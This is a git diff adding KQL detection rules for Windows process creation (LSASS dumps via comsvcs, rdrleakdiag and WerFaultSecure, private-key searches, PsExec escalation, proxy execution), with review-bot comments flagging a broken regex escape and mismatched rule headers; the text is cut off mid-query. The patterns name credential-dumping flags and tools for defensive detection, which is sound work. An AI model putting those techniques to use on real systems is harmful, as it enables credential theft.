+// Author: frack113
+// Date: 2022-12-27
+// Level: high
+// Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.009
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "\\w+`(\\w+|-|.)`[\\w+|\\s]" or ProcessCommandLine matches regex ""(\\{\\d\\})+"\\s*-f" or ProcessCommandLine matches regex "(?i)\\$\\{`?e`?n`?v`?:`?p`?a`?t`?h`?\\}") and (not(ProcessCommandLine contains "${env:path}"))
\ No newline at end of file
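Review bot: The second `matches regex` literal in the token-obfuscation query, `""(\\{\\d\\})+"\\s*-f"`, is not a valid KQL string: the double quotes that are part of the pattern were not escaped during conversion, so the parser sees an empty string `""` followed by stray tokens and the whole query fails to compile, which silently drops a high-severity detection from the pack. It should be emitted as `ProcessCommandLine matches regex "\"(\\{\\d\\})+\"\\s*-f"` (or as a verbatim string with the embedded quotes doubled). The other two patterns on the same line, which contain only backslashes and backticks, are escaped correctly, so this looks like a missing quote-escape in the converter's regex path rather than a one-off and deserves a converter-level test plus a parse check of every generated `.kql` in the workflow.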
diff --git a/KQL/rules/windows/process_creation/powershell_web_access_feature_enabled_via_dism.kql b/KQL/rules/windows/process_creation/powershell_web_access_feature_enabled_via_dism.kql
new file mode 100644
index 00000000..fb4dba3f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_web_access_feature_enabled_via_dism.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Web Access Feature Enabled Via DISM
+// Author: Michael Haag
+// Date: 2024-09-03
+// Level: high
+// Description: Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548.002
+// False Positives:
+// - Legitimate PowerShell Web Access installations by administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "WindowsPowerShellWebAccess" and ProcessCommandLine contains "/online" and ProcessCommandLine contains "/enable-feature") and (FolderPath endswith "\\dism.exe" or ProcessVersionInfoOriginalFileName =~ "DISM.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/ppl_tampering_via_werfaultsecure.kql b/KQL/rules/windows/process_creation/ppl_tampering_via_werfaultsecure.kql
new file mode 100644
index 00000000..e4806476
--- /dev/null
+++ b/KQL/rules/windows/process_creation/ppl_tampering_via_werfaultsecure.kql
@@ -0,0 +1,17 @@
+// Title: PPL Tampering Via WerFaultSecure
+// Author: Jason (https://github.com/0xbcf)
+// Date: 2025-09-23
+// Level: high
+// Description: Detects potential abuse of WerFaultSecure.exe to dump Protected Process Light (PPL) processes like LSASS or to freeze security solutions (EDR/antivirus).
+// This technique is used by tools such as EDR-Freeze and WSASS to bypass PPL protections and access sensitive information or disable security software.
+// Distinct command line patterns help identify the specific tool:
+// - WSASS usage typically shows: "WSASS.exe WerFaultSecure.exe [PID]" in ParentCommandLine
+// - EDR-Freeze usage typically shows: "EDR-Freeze_[version].exe [PID] [timeout]" in ParentCommandLine
+// Legitimate debugging operations using WerFaultSecure are rare in production environments and should be investigated.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001, attack.credential-access, attack.t1003.001
+// False Positives:
+// - Legitimate usage of WerFaultSecure for debugging purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /h " and ProcessCommandLine contains " /pid " and ProcessCommandLine contains " /tid " and ProcessCommandLine contains " /encfile " and ProcessCommandLine contains " /cancel " and ProcessCommandLine contains " /type " and ProcessCommandLine contains " 268310") and (FolderPath endswith "\\WerFaultSecure.exe" or ProcessVersionInfoOriginalFileName =~ "WerFaultSecure.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/printbrm_zip_creation_of_extraction.kql b/KQL/rules/windows/process_creation/printbrm_zip_creation_of_extraction.kql
new file mode 100644
index 00000000..2ad7a4d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/printbrm_zip_creation_of_extraction.kql
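Review bot: The two tool-attribution bullets in the WerFaultSecure header tell the analyst to look in `ParentCommandLine`, but that is the Sigma field name, not a column of `DeviceProcessEvents`; the parent's command line in this table is `InitiatingProcessCommandLine`, and the `| where` clause below never references it, so the attribution hint cannot be acted on from the query as written. The converter should map field names inside carried-over descriptions the same way it maps them in conditions, e.g. `// - WSASS usage typically shows: "WSASS.exe WerFaultSecure.exe [PID]" in InitiatingProcessCommandLine`. It is also worth noting in the header that the match requires all seven flag tokens to be present on one command line, so a hit is a full dump invocation rather than any WerFaultSecure start.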
@@ -0,0 +1,10 @@
+// Title: PrintBrm ZIP Creation of Extraction
+// Author: frack113
+// Date: 2022-05-02
+// Level: high
+// Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -f" and ProcessCommandLine contains ".zip") and FolderPath endswith "\\PrintBrm.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/private_keys_reconnaissance_via_commandline_tools.kql b/KQL/rules/windows/process_creation/private_keys_reconnaissance_via_commandline_tools.kql
new file mode 100644
index 00000000..661a302c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/private_keys_reconnaissance_via_commandline_tools.kql
@@ -0,0 +1,10 @@
+// Title: Private Keys Reconnaissance Via CommandLine Tools
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-07-20
+// Level: medium
+// Description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".key" or ProcessCommandLine contains ".pgp" or ProcessCommandLine contains ".gpg" or ProcessCommandLine contains ".ppk" or ProcessCommandLine contains ".p12" or ProcessCommandLine contains ".pem" or ProcessCommandLine contains ".pfx" or ProcessCommandLine contains ".cer" or ProcessCommandLine contains ".p7b" or ProcessCommandLine contains ".asc") and ((ProcessCommandLine contains "dir " and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or (ProcessCommandLine contains "Get-ChildItem " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) or (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/privilege_escalation_via_named_pipe_impersonation.kql b/KQL/rules/windows/process_creation/privilege_escalation_via_named_pipe_impersonation.kql
new file mode 100644
index 00000000..1f5d0adf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/privilege_escalation_via_named_pipe_impersonation.kql
@@ -0,0 +1,12 @@
+// Title: Privilege Escalation via Named Pipe Impersonation
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021
+// False Positives:
+// - Other programs that cause these patterns (please report)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "echo" and ProcessCommandLine contains ">" and ProcessCommandLine contains "\\\\.\\pipe\\") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/procdump_execution.kql b/KQL/rules/windows/process_creation/procdump_execution.kql
new file mode 100644
index 00000000..8ebc8682
--- /dev/null
+++ b/KQL/rules/windows/process_creation/procdump_execution.kql
@@ -0,0 +1,12 @@
+// Title: Procdump Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-16
+// Level: medium
+// Description: Detects usage of the SysInternals Procdump utility
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+// - Legitimate use of procdump by a developer or administrator
+
+DeviceProcessEvents
+| where FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_access_via_trolleyexpress_exclusion.kql b/KQL/rules/windows/process_creation/process_access_via_trolleyexpress_exclusion.kql
new file mode 100644
index 00000000..bfd8847d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_access_via_trolleyexpress_exclusion.kql
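Review bot: The Description, MITRE Tactic and Tags of the named-pipe rule do not describe its logic: the `| where` clause matches cmd/powershell command lines containing `echo`, `>` and `\\.\pipe\`, i.e. output redirected into a local named pipe, while the header says "remote file copy attempt to a hidden network share" and tags it `attack.lateral-movement, attack.t1021`. An analyst triaging a hit reads the header first and will misjudge the alert, and any tactic-based routing of this rule lands in the wrong queue. If the wording is inherited from the upstream rule the fix belongs there too, but the generated header should at least agree with its own Title, e.g. `// Description: Detects cmd or PowerShell command lines that redirect echo output into a local named pipe, a pattern associated with named pipe impersonation for privilege escalation.` with the tactic and tags adjusted to match.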
@@ -0,0 +1,10 @@
+// Title: Process Access via TrolleyExpress Exclusion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-10
+// Level: high
+// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, attack.credential-access, attack.t1003.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\TrolleyExpress 7" or ProcessCommandLine contains "\\TrolleyExpress 8" or ProcessCommandLine contains "\\TrolleyExpress 9" or ProcessCommandLine contains "\\TrolleyExpress.exe 7" or ProcessCommandLine contains "\\TrolleyExpress.exe 8" or ProcessCommandLine contains "\\TrolleyExpress.exe 9" or ProcessCommandLine contains "\\TrolleyExpress.exe -ma ") or (FolderPath endswith "\\TrolleyExpress.exe" and (not((isnull(ProcessVersionInfoOriginalFileName) or ProcessVersionInfoOriginalFileName contains "CtxInstall"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_creation_using_sysnative_folder.kql b/KQL/rules/windows/process_creation/process_creation_using_sysnative_folder.kql
new file mode 100644
index 00000000..2991b840
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_creation_using_sysnative_folder.kql
@@ -0,0 +1,10 @@
+// Title: Process Creation Using Sysnative Folder
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-08-23
+// Level: medium
+// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":\\Windows\\Sysnative\\" or FolderPath contains ":\\Windows\\Sysnative\\") and (not((ProcessCommandLine contains "install" and (FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework64\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\FrameworkArm\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v") and FolderPath endswith "\\ngen.exe"))) and (not((ProcessCommandLine contains "\"C:\\Windows\\sysnative\\cmd.exe\"" and ProcessCommandLine contains "\\xampp\\" and ProcessCommandLine contains "\\catalina_start.bat")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_execution_from_a_potentially_suspicious_folder.kql b/KQL/rules/windows/process_creation/process_execution_from_a_potentially_suspicious_folder.kql
new file mode 100644
index 00000000..1832f3e8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_execution_from_a_potentially_suspicious_folder.kql
@@ -0,0 +1,10 @@
+// Title: Process Execution From A Potentially Suspicious Folder
+// Author: Florian Roth (Nextron Systems), Tim Shelton
+// Date: 2019-01-16
+// Level: high
+// Description: Detects a potentially suspicious execution from an uncommon folder.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where (FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\All Users\\" or FolderPath contains ":\\Users\\Default\\" or FolderPath contains ":\\Users\\NetworkService\\" or FolderPath contains ":\\Windows\\addins\\" or FolderPath contains ":\\Windows\\debug\\" or FolderPath contains ":\\Windows\\Fonts\\" or FolderPath contains ":\\Windows\\Help\\" or FolderPath contains ":\\Windows\\IME\\" or FolderPath contains ":\\Windows\\Media\\" or FolderPath contains ":\\Windows\\repair\\" or FolderPath contains ":\\Windows\\security\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains "$Recycle.bin" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Intel\\Logs\\" or FolderPath contains "\\RSA\\MachineKeys\\") and (not(((FolderPath endswith "\\CitrixReceiverUpdater.exe" and FolderPath startswith "C:\\Windows\\SysWOW64\\config\\systemprofile\\Citrix\\UpdaterBinaries\\") or FolderPath startswith "C:\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_launched_without_image_name.kql b/KQL/rules/windows/process_creation/process_launched_without_image_name.kql
new file mode 100644
index 00000000..25656e9f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_launched_without_image_name.kql
@@ -0,0 +1,12 @@
+// Title: Process Launched Without Image Name
+// Author: Matt Anderson (Huntress)
+// Date: 2024-07-23
+// Level: medium
+// Description: Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Rare legitimate software.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_memory_dump_via_comsvcs_dll.kql b/KQL/rules/windows/process_creation/process_memory_dump_via_comsvcs_dll.kql
new file mode 100644
index 00000000..b9b7a90d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_memory_dump_via_comsvcs_dll.kql
@@ -0,0 +1,12 @@
+// Title: Process Memory Dump Via Comsvcs.DLL
+// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2020-02-18
+// Level: high
+// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001, car.2013-05-009
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") and ((ProcessCommandLine contains "#-" or ProcessCommandLine contains "#+" or ProcessCommandLine contains "#24" or ProcessCommandLine contains "24 " or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "#65560") and (ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))) or ((ProcessCommandLine contains " #" or ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains "\"#") and (ProcessCommandLine contains "24" and ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_memory_dump_via_dotnet_dump.kql b/KQL/rules/windows/process_creation/process_memory_dump_via_dotnet_dump.kql
new file mode 100644
index 00000000..8e9c3f19
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_memory_dump_via_dotnet_dump.kql
@@ -0,0 +1,12 @@
+// Title: Process Memory Dump Via Dotnet-Dump
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: medium
+// Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "collect" and (FolderPath endswith "\\dotnet-dump.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-dump.dll")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_memory_dump_via_rdrleakdiag_exe.kql b/KQL/rules/windows/process_creation/process_memory_dump_via_rdrleakdiag_exe.kql
new file mode 100644
index 00000000..bac09fa4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_memory_dump_via_rdrleakdiag_exe.kql
@@ -0,0 +1,12 @@
+// Title: Process Memory Dump via RdrLeakDiag.EXE
+// Author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-09-24
+// Level: high
+// Description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-memdmp" or ProcessCommandLine contains "/memdmp" or ProcessCommandLine contains "–memdmp" or ProcessCommandLine contains "—memdmp" or ProcessCommandLine contains "―memdmp" or ProcessCommandLine contains "fullmemdmp") and (ProcessCommandLine contains " -o " or ProcessCommandLine contains " /o " or ProcessCommandLine contains " –o " or ProcessCommandLine contains " —o " or ProcessCommandLine contains " ―o " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " /p " or ProcessCommandLine contains " –p " or ProcessCommandLine contains " —p " or ProcessCommandLine contains " ―p ") and (FolderPath endswith "\\rdrleakdiag.exe" or ProcessVersionInfoOriginalFileName =~ "RdrLeakDiag.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_proxy_execution_via_squirrel_exe.kql b/KQL/rules/windows/process_creation/process_proxy_execution_via_squirrel_exe.kql
new file mode 100644
index 00000000..272776a6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_proxy_execution_via_squirrel_exe.kql
@@ -0,0 +1,12 @@
+// Title: Process Proxy Execution Via Squirrel.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
+// Date: 2022-06-09
+// Level: medium
+// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+// False Positives:
+// - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--processStartAndWait" or ProcessCommandLine contains "--createShortcut") and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")) and (not((((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStart") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Discord\\Update.exe" and ProcessCommandLine contains "Discord.exe")) or ((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStartAndWait") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\GitHubDesktop\\Update.exe" and ProcessCommandLine contains "GitHubDesktop.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and ProcessCommandLine contains "Teams.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\yammerdesktop\\Update.exe" and 
ProcessCommandLine contains "Yammer.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/process_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..2307fbea
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Process Reconnaissance Via Wmic.EXE
+// Author: frack113
+// Date: 2022-01-01
+// Level: medium
+// Description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "process" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "call" and ProcessCommandLine contains "create")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/proxy_execution_via_vshadow.kql b/KQL/rules/windows/process_creation/proxy_execution_via_vshadow.kql
new file mode 100644
index 00000000..4623d3d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/proxy_execution_via_vshadow.kql
@@ -0,0 +1,15 @@
+// Title: Proxy Execution via Vshadow
+// Author: David Faiss
+// Date: 2025-05-26
+// Level: medium
+// Description: Detects the invocation of vshadow.exe with the -exec parameter that executes a specified script or command after the shadow copies are created but before the VShadow tool exits.
+// VShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag,
+// attackers can leverage this parameter to proxy the execution of malware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+// - System backup or administrator tools
+// - Legitimate administrative scripts
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-exec" and (FolderPath endswith "\\vshadow.exe" or ProcessVersionInfoOriginalFileName =~ "vshadow.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/proxy_execution_via_wuauclt_exe.kql b/KQL/rules/windows/process_creation/proxy_execution_via_wuauclt_exe.kql
new file mode 100644
index 00000000..91353a20
--- /dev/null
+++ b/KQL/rules/windows/process_creation/proxy_execution_via_wuauclt_exe.kql
@@ -0,0 +1,10 @@
+// Title: Proxy Execution Via Wuauclt.EXE
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
+// Date: 2020-10-12
+// Level: high
+// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "UpdateDeploymentProvider" and ProcessCommandLine contains "RunHandlerComServer") and (FolderPath endswith "\\wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "wuauclt.exe")) and (not((ProcessCommandLine contains " /UpdateDeploymentProvider UpdateDeploymentProvider.dll " or (ProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or ProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (ProcessCommandLine contains ":\\Windows\\WinSxS\\" and ProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ") or ProcessCommandLine contains " wuaueng.dll ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/psexec_execution.kql b/KQL/rules/windows/process_creation/psexec_execution.kql
new file mode 100644
index 00000000..751630a8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/psexec_execution.kql
@@ -0,0 +1,12 @@
+// Title: Psexec Execution
+// Author: omkar72
+// Date: 2020-10-30
+// Level: medium
+// Description: Detects user accept agreement execution in psexec commandline
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1569, attack.t1021
+// False Positives:
+// - Administrative scripts.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\psexec.exe" or ProcessVersionInfoOriginalFileName =~ "psexec.c"
\ No newline at end of file
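Review bot: The psexec_execution rule's Description, `Detects user accept agreement execution in psexec commandline`, does not match its logic: the `| where` clause only tests `FolderPath endswith "\\psexec.exe"` or `ProcessVersionInfoOriginalFileName =~ "psexec.c"` and never inspects `ProcessCommandLine`, so every PsExec launch fires whether or not a EULA-acceptance flag is present. The header should state what the query actually does, e.g. `// Description: Detects execution of the SysInternals PsExec binary, matched by image name or original file name`, and if the EULA wording is inherited from the upstream rule that should be said explicitly so nobody tunes on a condition the query does not contain. The mismatch is more confusing because the adjacent psexec_paexec_escalation rule (whose hunk runs past the end of this view) is the one that actually keys on `accepteula`.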
diff --git a/KQL/rules/windows/process_creation/psexec_paexec_escalation_to_local_system.kql b/KQL/rules/windows/process_creation/psexec_paexec_escalation_to_local_system.kql
new file mode 100644
index 00000000..b822e5f9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/psexec_paexec_escalation_to_local_system.kql
@@ -0,0 +1,13 @@
+// Title: PsExec/PAExec Escalation to LOCAL SYSTEM
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-11-23
+// Level: high
+// Description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001
+// False Positives:
+// - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)
+// - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "psexec" or ProcessCommandLine contains "paexec" or ProcessCommandLine contains "accepteula") and (ProcessCommandLine contains " -s cmd" or ProcessCommandLine contains " /s cmd" or ProcessCommandLine contains " –s cmd" or ProcessCommandLine contains " —s cmd" or ProcessCommandLine contains " ―s cmd" or ProcessCommandLine contains " -s -i cmd" or ProcessCommandLine contains " -s /i cmd" or ProcessCommandLine contains " -s –i cmd" or ProcessCommandLine contains " -s —i cmd" or ProcessCommandLine contains " -s ―i cmd" or ProcessCommandLine contains " /s -i cmd" or ProcessCommandLine contains " /s /i cmd" or ProcessCommandLine contains " /s –i cmd" or ProcessCommandLine contains " /s —i cmd" or ProcessCommandLine contains " /s ―i cmd" or ProcessCommandLine contains " –s -i cmd" or ProcessCommandLine contains " –s /i cmd" or ProcessCommandLine contains " –s –i cmd" or ProcessCommandLine contains " –s —i cmd" or ProcessCommandLine contains " –s ―i cmd" or ProcessCommandLine contains " —s -i cmd" or ProcessCommandLine contains " —s /i cmd" or ProcessCommandLine contains " —s –i cmd" or ProcessCommandLine contains " —s —i cmd" or ProcessCommandLine contains " —s ―i cmd" or ProcessCommandLine 
contains " ―s -i cmd" or ProcessCommandLine contains " ―s /i cmd" or ProcessCommandLine contains " ―s –i cmd" or ProcessCommandLine contains " ―s —i cmd" or ProcessCommandLine contains " ―s ―i cmd" or ProcessCommandLine contains " -i -s cmd" or ProcessCommandLine contains " -i /s cmd" or ProcessCommandLine contains " -i –s cmd" or ProcessCommandLine contains " -i —s cmd" or ProcessCommandLine contains " -i ―s cmd" or ProcessCommandLine contains " /i -s cmd" or ProcessCommandLine contains " /i /s cmd" or ProcessCommandLine contains " /i –s cmd" or ProcessCommandLine contains " /i —s cmd" or ProcessCommandLine contains " /i ―s cmd" or ProcessCommandLine contains " –i -s cmd" or ProcessCommandLine contains " –i /s cmd" or ProcessCommandLine contains " –i –s cmd" or ProcessCommandLine contains " –i —s cmd" or ProcessCommandLine contains " –i ―s cmd" or ProcessCommandLine contains " —i -s cmd" or ProcessCommandLine contains " —i /s cmd" or ProcessCommandLine contains " —i –s cmd" or ProcessCommandLine contains " —i —s cmd" or ProcessCommandLine contains " —i ―s cmd" or ProcessCommandLine contains " ―i -s cmd" or ProcessCommandLine contains " ―i /s cmd" or ProcessCommandLine contains " ―i –s cmd" or ProcessCommandLine contains " ―i —s cmd" or ProcessCommandLine contains " ―i ―s cmd" or ProcessCommandLine contains " -s pwsh" or ProcessCommandLine contains " /s pwsh" or ProcessCommandLine contains " –s pwsh" or ProcessCommandLine contains " —s pwsh" or ProcessCommandLine contains " ―s pwsh" or ProcessCommandLine contains " -s -i pwsh" or ProcessCommandLine contains " -s /i pwsh" or ProcessCommandLine contains " -s –i pwsh" or ProcessCommandLine contains " -s —i pwsh" or ProcessCommandLine contains " -s ―i pwsh" or ProcessCommandLine contains " /s -i pwsh" or ProcessCommandLine contains " /s /i pwsh" or ProcessCommandLine contains " /s –i pwsh" or ProcessCommandLine contains " /s —i pwsh" or ProcessCommandLine contains " /s ―i pwsh" or ProcessCommandLine contains " –s -i 
